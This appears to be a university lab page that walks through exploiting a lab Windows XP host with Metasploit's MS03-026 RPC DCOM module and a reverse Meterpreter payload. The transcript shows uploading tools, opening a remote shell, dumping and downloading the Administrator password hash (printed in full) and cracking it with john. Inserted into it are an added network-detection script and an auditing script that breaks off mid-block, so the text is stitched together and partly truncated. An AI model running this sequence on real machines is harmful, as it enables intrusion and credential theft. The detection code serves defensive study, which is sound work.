UCCS



Exploit XPUP using Msfconsole of framework 2 with meterpreter

Here we run msfconsole on viva and test it against an xpup machine.

First log in to viva and edit your .bash_profile to include the path to framework-2.7.

You can also use framework-3.0 if you are familiar with it. The two versions organize exploits and payloads differently; framework-3.0 is the more organized of the two.

Here is the PATH line in .bash_profile that I modified.

PATH=$PATH:$HOME/bin:/opt/framework-2.7

[cs591@viva ~]$ msfconsole

Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)

 ____________
< metasploit >
 ------------
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > show exploits

Metasploit Framework Loaded Exploits

====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow

Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Overflow

aim_goaway AOL Instant Messenger goaway Overflow

altn_webadmin Alt-N WebAdmin USER Buffer Overflow

apache_chunked_win32 Apache Win32 Chunked Encoding

arkeia_agent_access Arkeia Backup Client Remote Access

arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)

arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)

awstats_configdir_exec AWStats configdir Remote Command Execution

backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow

backupexec_dump Veritas Backup Exec Windows Remote File Access

backupexec_ns Veritas Backup Exec Name Service Overflow

backupexec_registry Veritas Backup Exec Server Registry Access

badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow

bakbone_netvault_heap BakBone NetVault Remote Heap Overflow

barracuda_img_exec Barracuda IMG.PL Remote Command Execution

blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow

bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow

bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow

cabrightstor_disco CA BrightStor Discovery Service Overflow

cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow

cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow

cabrightstor_uniagent CA BrightStor Universal Agent Overflow

cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)

cacti_graphimage_exec Cacti graph_image.php Remote Command Execution

calicclnt_getconfig CA License Client GETCONFIG Overflow

calicserv_getconfig CA License Server GETCONFIG Overflow

cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow

distcc_exec DistCC Daemon Command Execution

edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow

edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow

eiq_license EIQ License Manager Overflow

eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow

exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow

firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)

firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)

freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow

freeftpd_user freeFTPd USER Overflow

freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow

futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow

globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow

gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability

google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution

hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing

hpux_lpd_exec HP-UX LPD Command Execution

ia_webmail IA WebMail 3.x Buffer Overflow

icecast_header Icecast (compareTo() Code Execution

ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow

ms05_039_pnp Microsoft PnP MS05-039 Overflow

msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow

msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017

msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026

mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow

mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow

netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow

netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow

niprint_lpd NIPrint LPD Request Overflow

novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow

openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution

openview_omniback HP OpenView Omniback II Command Execution

oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)

oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)

oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)

pajax_remote_exec PAJAX Remote Command Execution

payload_handler Metasploit Framework Payload Handler

peercast_url_linux PeerCast 135

msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192

LHOST -> 128.198.60.192

msf msrpc_dcom_ms03_026 > set LPORT 4321

LPORT -> 4321

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads

====================================

win32_adduser Windows Execute net user /ADD

win32_bind Windows Bind Shell

win32_bind_dllinject Windows Bind DLL Inject

win32_bind_meterpreter Windows Bind Meterpreter DLL Inject

win32_bind_stg Windows Staged Bind Shell

win32_bind_stg_upexec Windows Staged Bind Upload/Execute

win32_bind_vncinject Windows Bind VNC Server DLL Inject

win32_downloadexec Windows Executable Download and Execute

win32_exec Windows Execute Command

win32_passivex Windows PassiveX ActiveX Injection Payload

win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload

win32_passivex_stg Windows Staged PassiveX Shell

win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload

win32_reverse Windows Reverse Shell

win32_reverse_dllinject Windows Reverse DLL Inject

win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject

win32_reverse_ord Windows Staged Reverse Ordinal Shell

win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject

win32_reverse_stg Windows Staged Reverse Shell

win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute

win32_reverse_vncinject Windows Reverse VNC Server Inject

msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter

win32_reverse_meterpreter:

msf msrpc_dcom_ms03_026 > set TARGET 2

TARGET -> 2

msf msrpc_dcom_ms03_026 > exploit

[*] This exploit requires a valid payload to be specified first.

msf msrpc_dcom_ms03_026 > set payload win32_reverse_meterpreter

payload -> win32_reverse_meterpreter

[*] WARNING: the correct case of the 'payload' variable is 'PAYLOAD'

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Invalid target specified.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set PAYLOAD win32_reverse_meterpreter

PAYLOAD -> win32_reverse_meterpreter

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Invalid target specified.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0

TARGET -> 0

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Got connection from 128.198.60.192:4321 128.198.60.156:1027

[*] Sending Intermediate Stager (89 bytes)

[*] Sending Stage (2834 bytes)

[*] Sleeping before sending dll.

[*] Uploading dll to memory (69643), Please wait...

[*] Upload completed

meterpreter>

[ -= connected to =- ]

[ -= meterpreter server =- ]

[ -= v. 00000500 =- ]

meterpreter> ls

invalid command

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

meterpreter> use -m Process

loadlib: Loading library from 'ext472627.dll' on the remote machine.

meterpreter>

loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

meterpreter> use -m Fs

loadlib: Loading library from 'ext500104.dll' on the remote machine.

meterpreter>

loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> upload wget.exe

Usage: upload src1 [src2 ...] dst

meterpreter> upload wget.exe c:\

upload: Starting upload of 'wget.exe' to 'c:\\wget.exe'...

upload: 1 uploads started.

meterpreter>

upload: Upload from 'wget.exe' succeeded.

meterpreter> upload plink.exe

Usage: upload src1 [src2 ...] dst

meterpreter> upload plink.exe c:\

upload: Starting upload of 'plink.exe' to 'c:\\plink.exe'...

upload: 1 uploads started.

meterpreter>

upload: Upload from 'plink.exe' succeeded.

meterpreter> execute -f wget.exe -a

execute: Executing 'wget.exe'...

meterpreter>

execute: failure, 2.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f c:\wget.exe -a

execute: Executing 'c:\wget.exe'...

meterpreter>

execute: success, process id is 188.

meterpreter> execute -f c:\wget.exe -a

execute: Executing 'c:\wget.exe'...

meterpreter>

execute: success, process id is 224.

meterpreter> execute -f c:\tftpd32.exe

execute: Executing 'c:\tftpd32.exe'...

meterpreter>

execute: failure, 2.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

execute: success, process id is 2020.

execute: allocated channel 3 for new process.

meterpreter> interact 3

interact: Switching to interactive console on 3...

meterpreter>

interact: Started interactive channel 3.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..

C:\>ls

ls

'ls' is not recognized as an internal or external command,

operable program or batch file.

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 10:58 PM 308,736 wget.exe

01/06/2007 11:27 PM WINDOWS

4 File(s) 538,112 bytes

4 Dir(s) 15,457,402,880 bytes free

C:\>plink.exe -ssh cs591@viva.uccs.edu

plink.exe -ssh cs591@viva.uccs.edu

The server's host key is not cached in the registry. You

have no guarantee that the server is the computer you

think it is.

The server's key fingerprint is:

ssh-rsa 2048 a8:e4:d7:d4:e7:61:dd:02:26:e6:c1:b5:f9:12:2b:83

If you trust this host, enter "y" to add the key to

PuTTY's cache and carry on connecting.

If you want to carry on connecting just once, without

adding the key to the cache, enter "n".

If you do not trust this host, press Return to abandon the

connection.

Store key in cache? (y/n) y

cs591@viva.uccs.edu's password: XXXXXX

cs591@viva.uccs.edu's password: XXXXXX

cs591@viva.uccs.edu's password: Caught interrupt, close interactive session? [y/N] y

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

execute: success, process id is 356.

execute: allocated channel 4 for new process.

meterpreter> interact 4

interact: Switching to interactive console on 4...

meterpreter>

interact: Started interactive channel 4.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..

C:\>ls

ls

'ls' is not recognized as an internal or external command,

operable program or batch file.

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

4 File(s) 538,112 bytes

4 Dir(s) 15,457,370,112 bytes free

C:\>plink -l cs591 -pw XXXXXX viva.uccs.edu

plink -l cs591 -pw XXXXX viva.uccs.edu

Last login: Wed May 9 00:15:10 2007 from c-75-70-32-124.hsd1.

[cs591@viva ~]$ ls

ls

bin CS591S2007Grade.txt out vmware

bufferOverflow Desktop public_html

cs591ClientFromViva.p12 framework-2.7-snapshot.tar.gz secure

[cs591@viva ~]$ exit

exit

logout

Using username "cs591".

C:\>plink -ssh cs591@viva.ucs.edu scp

plink -ssh cs591@viva.ucs.edu scp

Unable to open connection:

Host does not exist

C:\>

meterpreter> upload ../passwd-attack/PWDump4.exe c:\

upload: Starting upload of '../passwd-attack/PWDump4.exe' to 'c:\\PWDump4.exe'...

upload: 1 uploads started.

meterpreter>

upload: Upload from '../passwd-attack/PWDump4.exe' succeeded.

meterpreter> upload ../passwd-attack/PWDupm4.dll c:\

upload: Starting upload of '../passwd-attack/PWDupm4.dll' to 'c:\\PWDupm4.dll'...

upload: 1 uploads started.

meterpreter>

Error: Local file '../passwd-attack/PWDupm4.dll' could not be opened for reading.

meterpreter> upload ../passwd-attack/PWDump4.dll c:\

upload: Starting upload of '../passwd-attack/PWDump4.dll' to 'c:\\PWDump4.dll'...

upload: 1 uploads started.

meterpreter>

upload: Upload from '../passwd-attack/PWDump4.dll' succeeded.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.


meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

meterpreter>

meterpreter> show

invalid command

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

meterpreter> exit

exit

The meterpreter is shutting down...

[*] Meterpreter client finished.

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > quit
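The handler output in the run above records both halves of this technique as a network monitor would see them: viva (128.198.60.192) sends the request to the xpup host's RPC endpoint mapper on TCP 135, and moments later xpup (128.198.60.156) connects back to viva on the handler port 4321 ("Got connection from 128.198.60.192:4321 128.198.60.156:1027"). The script below is an added example, not part of the course page or of Metasploit; it correlates an inbound TCP/135 connection with a prompt outbound connection from the same host back to the same peer, which is the pattern a defender would look for in flow or firewall logs. The simplified flow-record format, the sample records (reusing the two lab addresses from the transcript), the 30-second window and the list of expected outbound ports are all constructed assumptions.

```python
"""Correlate inbound TCP/135 contact with a follow-on outbound connection
from the same host back to the same peer (exploit request, then reverse
handler callback). Added example for this page; the flow-record format is a
constructed simplification, not the output of any particular sensor."""

from collections import defaultdict
from datetime import datetime, timedelta

# Constructed flow records: timestamp, src ip, src port, dst ip, dst port.
# Addresses mirror the lab hosts in the transcript (viva .192, xpup .156);
# the other records are filler to show what is NOT flagged.
SAMPLE_FLOWS = """\
2007-03-05T23:05:01 128.198.60.192 33012 128.198.60.156 135
2007-03-05T23:05:03 128.198.60.156 1027 128.198.60.192 4321
2007-03-05T23:06:10 128.198.60.20 1040 128.198.60.156 135
2007-03-05T23:06:12 128.198.60.156 1028 128.198.60.20 445
2007-03-05T23:40:00 128.198.60.156 1050 128.198.60.192 80
"""

RPC_EPM_PORT = 135                  # RPC endpoint mapper (RPORT in the session above)
WINDOW = timedelta(seconds=30)      # assumed: how soon a callback must follow
# Assumed: outbound ports considered ordinary Windows/web traffic even when
# they follow RPC contact from the same peer (SMB, NetBIOS, HTTP, HTTPS).
BENIGN_DST_PORTS = {80, 443, 445, 139}


def parse_flows(text):
    """Parse the constructed record format into tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def find_rpc_callbacks(flows):
    """Return (victim, peer, callback_port, delay_seconds) for every inbound
    TCP/135 connection that is followed, within WINDOW, by a connection from
    the contacted host back to the same peer on a non-benign port."""
    rpc_contacts = defaultdict(list)        # (contacted host, peer) -> [timestamps]
    for ts, src, _, dst, dport in flows:
        if dport == RPC_EPM_PORT:
            rpc_contacts[(dst, src)].append(ts)

    findings = []
    for ts, src, _, dst, dport in flows:
        if dport == RPC_EPM_PORT or dport in BENIGN_DST_PORTS:
            continue
        for contact in rpc_contacts.get((src, dst), []):
            if contact <= ts <= contact + WINDOW:
                findings.append((src, dst, dport, (ts - contact).total_seconds()))
                break
    return findings


if __name__ == "__main__":
    for victim, peer, port, delay in find_rpc_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{victim} called back to {peer}:{port} {delay:.0f}s after RPC/135 contact")
```

On the sample data only the viva/xpup pair is reported: the second RPC contact from .20 is followed by ordinary SMB traffic and the later HTTP connection to viva falls outside the window. A real deployment would read flows from the firewall or NetFlow exporter and would tune the window and the benign-port list to the site; the point is that the reverse-handler design of this payload leaves a short, distinctive two-connection sequence that is easy to correlate.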

[cs591@viva tools]$ msfconsole

Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)

(msfconsole ASCII-art "metasploit" banner)

+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > set msrpc_dcom_ms03_026

msfconsole: set: command not found

msf > use msrpc_dcom_ms03_026

msf msrpc_dcom_ms03_026 > set RHOST 128.198.60.156

RHOST -> 128.198.60.156

msf msrpc_dcom_ms03_026 > set RPORT 135

RPORT -> 135

msf msrpc_dcom_ms03_026 > set LHOST 128.198.60.192

LHOST -> 128.198.60.192

msf msrpc_dcom_ms03_026 > set LPORT 4321

LPORT -> 4321

msf msrpc_dcom_ms03_026 > set win32_reverse_meterpreter

win32_reverse_meterpreter:

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter

PAYLOAD -> win32_reverse_meterpreter

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set TARGET 0

TARGET -> 0

msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit

[*] Starting Reverse Handler.

[*] Sending request...

[*] Got connection from 128.198.60.192:4321 128.198.60.156:1027

[*] Sending Intermediate Stager (89 bytes)

[*] Sending Stage (2834 bytes)

[*] Sleeping before sending dll.

[*] Uploading dll to memory (69643), Please wait...

[*] Upload completed

meterpreter>

[ -= connected to =- ]

[ -= meterpreter server =- ]

[ -= v. 00000500 =- ]

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

meterpreter> use -m Process

loadlib: Loading library from 'ext285386.dll' on the remote machine.

meterpreter>

loadlib: success.

meterpreter> use -m Fs

loadlib: Loading library from 'ext821455.dll' on the remote machine.

meterpreter>

loadlib: success.

meterpreter> help

Core Core feature set commands

------------ ----------------

read Reads from a communication channel

write Writes to a communication channel

close Closes a communication channel

interact Switch to interactive mode with a channel

help Displays the list of all register commands

exit Exits the client

initcrypt Initializes the cryptographic subsystem

Extensions Feature extension commands

------------ ----------------

loadlib Loads a library on the remote endpoint

use Uses a feature extension module

Process Process manipulation and execution commands

------------ ----------------

execute Executes a process on the remote endpoint

kill Terminate one or more processes on the remote endpoint

ps List processes on the remote endpoint

File System File system interaction and manipulation commands

------------ ----------------

cd Change working directory.

getcwd Get the current working directory.

ls List the contents of a directory.

upload Upload one or more files to a remote directory.

download Download one or more files from a remote directory.

meterpreter> execute -f cmd -c

execute: Executing 'cmd'...

meterpreter>

execute: success, process id is 320.

execute: allocated channel 1 for new process.

meterpreter> interact 1

interact: Switching to interactive console on 1...

meterpreter>

interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..

cd ..

C:\WINDOWS>cd ..

cd ..

C:\>ls

ls

'ls' is not recognized as an internal or external command,

operable program or batch file.

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 11:20 PM 0 PWDupm4.dll

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

7 File(s) 559,104 bytes

4 Dir(s) 15,457,337,344 bytes free

C:\>delete PWDupm4.dll

delete PWDupm4.dll

'delete' is not recognized as an internal or external command,

operable program or batch file.

C:\>del PWDupm4.dll

del PWDupm4.dll

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

6 File(s) 559,104 bytes

4 Dir(s) 15,457,337,344 bytes free

C:\>PWDump4

PWDump4

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.

by bingle@.cn

This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]

[Target] -- Target Computer's ip or name to work,

[/l] -- works on local Computer.

[/s:share] -- Share used to copy files instead of Admin$.

[/o:outputFile] -- Result filename for output.

[/u:userName] -- UserName used to connect, provide password later.

[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:passwd.txt

PWDump4 /l /o:passwd.txt

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.

by bingle@.cn

This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

SRV>Version: OS Ver 5.1, , Workstation

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 11:34 PM 88 passwd.txt

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

7 File(s) 559,192 bytes

4 Dir(s) 15,457,329,152 bytes free

C:\>vi passwd.txt

vi passwd.txt

'vi' is not recognized as an internal or external command,

operable program or batch file.

C:\>cat passwd.txt

cat passwd.txt

'cat' is not recognized as an internal or external command,

operable program or batch file.

C:\>more passwd.txt

more passwd.txt

Administrator:500:626309417146BFFDAAD3B435B51404EE:C136578936200A5DDAB03847745758F7:::

C:\>PWDump4

PWDump4

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.

by bingle@.cn

This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

Usage: PWDUMP4 [Target | /l] [/s:share] [/o:outputFile] [/u:userName]

[Target] -- Target Computer's ip or name to work,

[/l] -- works on local Computer.

[/s:share] -- Share used to copy files instead of Admin$.

[/o:outputFile] -- Result filename for output.

[/u:userName] -- UserName used to connect, provide password later.

[/r[:newname]] -- Rename the files to 'newname' when copy to the target, rename service name also, see FAQ for more.

C:\>PWDump4 /l /o:pw.txt

PWDump4 /l /o:pw.txt

PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.

by bingle@.cn

This program is free software based on pwpump3 by Phil Staubs

under the GNU General Public License Version 2.

SRV>Version: OS Ver 5.1, , Workstation

C:\>dir

dir

Volume in drive C has no label.

Volume Serial Number is ECC2-88FC

Directory of C:\

07/27/2004 09:21 PM 0 AUTOEXEC.BAT

07/27/2004 09:21 PM 0 CONFIG.SYS

07/27/2004 09:54 PM cs301

01/07/2007 12:23 AM Documents and Settings

03/05/2007 11:34 PM 88 passwd.txt

03/05/2007 10:59 PM 229,376 plink.exe

01/07/2007 12:20 AM Program Files

03/05/2007 11:42 PM 169 pw.txt

03/05/2007 11:20 PM 4,608 PWDump4.dll

03/05/2007 11:19 PM 16,384 PWDump4.exe

03/05/2007 10:58 PM 308,736 wget.exe

03/05/2007 11:09 PM WINDOWS

8 File(s) 559,361 bytes

4 Dir(s) 15,456,821,248 bytes free

C:\>

C:\>exit

exit

interact: Ending interactive session.

meterpreter> download c:\pw.txt /pentest

download: Starting download from 'c:\pw.txt' to '/pentest/pw.txt'...

download: 1 downloads started.

meterpreter>

download: Download to '/pentest/pw.txt' succeeded.

meterpreter> download c:\passwd.txt /pentest

download: Starting download from 'c:\passwd.txt' to '/pentest/passwd.txt'...

download: 1 downloads started.

meterpreter>

download: Download to '/pentest/passwd.txt' succeeded.

meterpreter> quit

[cs591@viva pentest]$ password/john-1.7.2/run/john pw.txt

password/john-1.7.2/run/john: error while loading shared libraries: libcrypto.so.0: cannot open shared object file: No such file or directory

[cs591@viva pentest]$ john pw.txt

Loaded 2 passwords with no different salts (NT LM DES [24/32 4K])

................
................
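The passwd.txt line shown earlier (user:RID:LM hash:NT hash:::) is the pwdump format that john consumes, and john's "NT LM DES" format line shows that it loaded LM hashes, which is only possible because the xpup machine still stores them. The script below is an added example, not part of the course page, of PWDump4 or of john; it parses that format and audits each account for the storage weaknesses a defender would fix: an LM hash being stored at all (the NoLMHash policy turns this off), an LM second half equal to the well-known empty-half constant (the password is seven characters or shorter), and an NT hash equal to the empty-password constant. The first sample line is the Administrator entry from the page's transcript; the other two lines and the account names in them are constructed.

```python
"""Audit a pwdump-format hash file (user:RID:LMhash:NThash:::) for weak
password-storage settings. Added example for this page, not part of the
course material, of PWDump4 or of john."""

# Well-known constants: the LM hash of the empty string (each 16-hex-char
# half is the DES encryption of the constant with a blank 7-byte key) and
# the NT hash (MD4 of the UTF-16LE password) of the empty string.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# Sample input. The first line is the Administrator entry from the page's
# passwd.txt; the other two are constructed to cover the remaining cases.
SAMPLE_PWDUMP = """\
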